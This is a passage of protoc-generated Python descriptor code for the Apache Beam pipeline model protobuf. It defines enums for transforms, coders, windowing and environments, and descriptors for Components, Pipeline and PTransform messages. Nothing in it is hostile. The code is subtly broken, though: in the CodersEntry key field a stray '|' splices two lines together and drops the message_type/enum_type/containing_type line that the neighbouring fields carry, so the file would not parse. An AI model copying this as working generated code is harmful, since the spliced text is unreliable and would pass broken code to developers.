full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.Primitives',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PAR_DO', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033urn:beam:transform:pardo:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='FLATTEN', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:flatten:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='GROUP_BY_KEY', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\036beam:transform:group_by_key:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='IMPULSE', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:impulse:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='ASSIGN_WINDOWS', index=4, number=4,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:window_into:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='TEST_STREAM', index=5, number=5,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 urn:beam:transform:teststream:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='MAP_WINDOWS', index=6, number=6,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:map_windows:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='MERGE_WINDOWS', index=7, number=7,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\037beam:transform:merge_windows:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=1912,
serialized_end=2345,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_PRIMITIVES)
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES = _descriptor.EnumDescriptor(
name='DeprecatedPrimitives',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.DeprecatedPrimitives',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='READ', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:transform:read:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='CREATE_VIEW', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:create_view:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=2347,
serialized_end=2463,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES)
_STANDARDPTRANSFORMS_COMPOSITES = _descriptor.EnumDescriptor(
name='Composites',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.Composites',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005!beam:transform:combine_per_key:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_GLOBALLY', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\"beam:transform:combine_globally:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='RESHUFFLE', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:transform:reshuffle:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_FILES', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:write_files:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=2466,
serialized_end=2708,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_COMPOSITES)
_STANDARDPTRANSFORMS_COMBINECOMPONENTS = _descriptor.EnumDescriptor(
name='CombineComponents',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.CombineComponents',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='COMBINE_PGBKCV', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 beam:transform:combine_pgbkcv:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_MERGE_ACCUMULATORS', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_merge_accumulators:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_EXTRACT_OUTPUTS', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005)beam:transform:combine_extract_outputs:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY_PRECOMBINE', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:combine_per_key_precombine:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY_MERGE_ACCUMULATORS', index=4, number=4,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0054beam:transform:combine_per_key_merge_accumulators:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_PER_KEY_EXTRACT_OUTPUTS', index=5, number=5,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\0051beam:transform:combine_per_key_extract_outputs:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='COMBINE_GROUPED_VALUES', index=6, number=6,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005(beam:transform:combine_grouped_values:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=2711,
serialized_end=3306,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_COMBINECOMPONENTS)
_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS = _descriptor.EnumDescriptor(
name='SplittableParDoComponents',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.SplittableParDoComponents',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PAIR_WITH_RESTRICTION', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005+beam:transform:sdf_pair_with_restriction:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='SPLIT_RESTRICTION', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\'beam:transform:sdf_split_restriction:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESS_KEYED_ELEMENTS', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005,beam:transform:sdf_process_keyed_elements:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESS_ELEMENTS', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005&beam:transform:sdf_process_elements:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=3309,
serialized_end=3632,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_SPLITTABLEPARDOCOMPONENTS)
_STANDARDSIDEINPUTTYPES_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.StandardSideInputTypes.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ITERABLE', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:iterable:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='MULTIMAP', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:side_input:multimap:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=3661,
serialized_end=3765,
)
_sym_db.RegisterEnumDescriptor(_STANDARDSIDEINPUTTYPES_ENUM)
_PARAMETER_TYPE_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.Parameter.Type.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WINDOW', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PIPELINE_OPTIONS', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RESTRICTION_TRACKER', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=4866,
serialized_end=4948,
)
_sym_db.RegisterEnumDescriptor(_PARAMETER_TYPE_ENUM)
_ISBOUNDED_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.IsBounded.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNBOUNDED', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BOUNDED', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=5762,
serialized_end=5813,
)
_sym_db.RegisterEnumDescriptor(_ISBOUNDED_ENUM)
_STANDARDCODERS_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.StandardCoders.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='BYTES', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:bytes:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='KV', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\020beam:coder:kv:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='VARINT', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:coder:varint:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='ITERABLE', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\026beam:coder:iterable:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='TIMER', index=4, number=4,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:coder:timer:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='INTERVAL_WINDOW', index=5, number=5,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:coder:interval_window:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='LENGTH_PREFIX', index=6, number=6,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:length_prefix:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='GLOBAL_WINDOW', index=7, number=7,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033beam:coder:global_window:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='WINDOWED_VALUE', index=8, number=8,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\034beam:coder:windowed_value:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=7437,
serialized_end=7857,
)
_sym_db.RegisterEnumDescriptor(_STANDARDCODERS_ENUM)
_MERGESTATUS_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.MergeStatus.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NON_MERGING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NEEDS_MERGE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ALREADY_MERGED', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8506,
serialized_end=8583,
)
_sym_db.RegisterEnumDescriptor(_MERGESTATUS_ENUM)
_ACCUMULATIONMODE_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.AccumulationMode.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DISCARDING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ACCUMULATING', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8605,
serialized_end=8662,
)
_sym_db.RegisterEnumDescriptor(_ACCUMULATIONMODE_ENUM)
_CLOSINGBEHAVIOR_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.ClosingBehavior.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EMIT_ALWAYS', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EMIT_IF_NONEMPTY', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8683,
serialized_end=8745,
)
_sym_db.RegisterEnumDescriptor(_CLOSINGBEHAVIOR_ENUM)
_ONTIMEBEHAVIOR_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.OnTimeBehavior.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FIRE_ALWAYS', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FIRE_IF_NONEMPTY', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8765,
serialized_end=8827,
)
_sym_db.RegisterEnumDescriptor(_ONTIMEBEHAVIOR_ENUM)
_OUTPUTTIME_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.OutputTime.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='END_OF_WINDOW', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LATEST_IN_PANE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EARLIEST_IN_PANE', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8843,
serialized_end=8927,
)
_sym_db.RegisterEnumDescriptor(_OUTPUTTIME_ENUM)
_TIMEDOMAIN_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.TimeDomain.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EVENT_TIME', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESSING_TIME', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SYNCHRONIZED_PROCESSING_TIME', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=8943,
serialized_end=9037,
)
_sym_db.RegisterEnumDescriptor(_TIMEDOMAIN_ENUM)
_STANDARDENVIRONMENTS_ENVIRONMENTS = _descriptor.EnumDescriptor(
name='Environments',
full_name='org.apache.beam.model.pipeline.v1.StandardEnvironments.Environments',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='DOCKER', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\022beam:env:docker:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='PROCESS', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\023beam:env:process:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='EXTERNAL', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\024beam:env:external:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=11436,
serialized_end=11570,
)
_sym_db.RegisterEnumDescriptor(_STANDARDENVIRONMENTS_ENVIRONMENTS)
_DISPLAYDATA_TYPE_ENUM = _descriptor.EnumDescriptor(
name='Enum',
full_name='org.apache.beam.model.pipeline.v1.DisplayData.Type.Enum',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='STRING', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INTEGER', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FLOAT', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BOOLEAN', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TIMESTAMP', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DURATION', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JAVA_CLASS', index=7, number=7,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=12374,
serialized_end=12491,
)
_sym_db.RegisterEnumDescriptor(_DISPLAYDATA_TYPE_ENUM)
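# End of EnumDescriptor registrations. The _descriptor.Descriptor definitions that follow
# are emitted by protoc for the Beam pipeline model message types (Components, Pipeline,
# PTransform, the transform payloads, etc.); field numbers and serialized offsets are
# generated and would be overwritten on regeneration.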
_BEAMCONSTANTS = _descriptor.Descriptor(
name='BeamConstants',
full_name='org.apache.beam.model.pipeline.v1.BeamConstants',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_BEAMCONSTANTS_CONSTANTS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=122,
serialized_end=316,
)
_COMPONENTS_TRANSFORMSENTRY = _descriptor.Descriptor(
name='TransformsEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.TransformsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.TransformsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.TransformsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=767,
serialized_end=863,
)
_COMPONENTS_PCOLLECTIONSENTRY = _descriptor.Descriptor(
name='PcollectionsEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=865,
serialized_end=964,
)
_COMPONENTS_WINDOWINGSTRATEGIESENTRY = _descriptor.Descriptor(
name='WindowingStrategiesEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=966,
serialized_end=1078,
)
_COMPONENTS_CODERSENTRY = _descriptor.Descriptor(
name='CodersEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.CodersEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.CodersEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'), | is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.CodersEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1080,
serialized_end=1167,
)
_COMPONENTS_ENVIRONMENTSENTRY = _descriptor.Descriptor(
name='EnvironmentsEntry',
full_name='org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1169,
serialized_end=1268,
)
_COMPONENTS = _descriptor.Descriptor(
name='Components',
full_name='org.apache.beam.model.pipeline.v1.Components',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='transforms', full_name='org.apache.beam.model.pipeline.v1.Components.transforms', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pcollections', full_name='org.apache.beam.model.pipeline.v1.Components.pcollections', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='windowing_strategies', full_name='org.apache.beam.model.pipeline.v1.Components.windowing_strategies', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='coders', full_name='org.apache.beam.model.pipeline.v1.Components.coders', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='environments', full_name='org.apache.beam.model.pipeline.v1.Components.environments', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_COMPONENTS_TRANSFORMSENTRY, _COMPONENTS_PCOLLECTIONSENTRY, _COMPONENTS_WINDOWINGSTRATEGIESENTRY, _COMPONENTS_CODERSENTRY, _COMPONENTS_ENVIRONMENTSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=319,
serialized_end=1268,
)
_PIPELINE = _descriptor.Descriptor(
name='Pipeline',
full_name='org.apache.beam.model.pipeline.v1.Pipeline',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='components', full_name='org.apache.beam.model.pipeline.v1.Pipeline.components', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='root_transform_ids', full_name='org.apache.beam.model.pipeline.v1.Pipeline.root_transform_ids', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='display_data', full_name='org.apache.beam.model.pipeline.v1.Pipeline.display_data', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1271,
serialized_end=1446,
)
_PTRANSFORM_INPUTSENTRY = _descriptor.Descriptor(
name='InputsEntry',
full_name='org.apache.beam.model.pipeline.v1.PTransform.InputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.PTransform.InputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.PTransform.InputsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1792,
serialized_end=1837,
)
_PTRANSFORM_OUTPUTSENTRY = _descriptor.Descriptor(
name='OutputsEntry',
full_name='org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.PTransform.OutputsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1839,
serialized_end=1885,
)
_PTRANSFORM = _descriptor.Descriptor(
name='PTransform',
full_name='org.apache.beam.model.pipeline.v1.PTransform',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
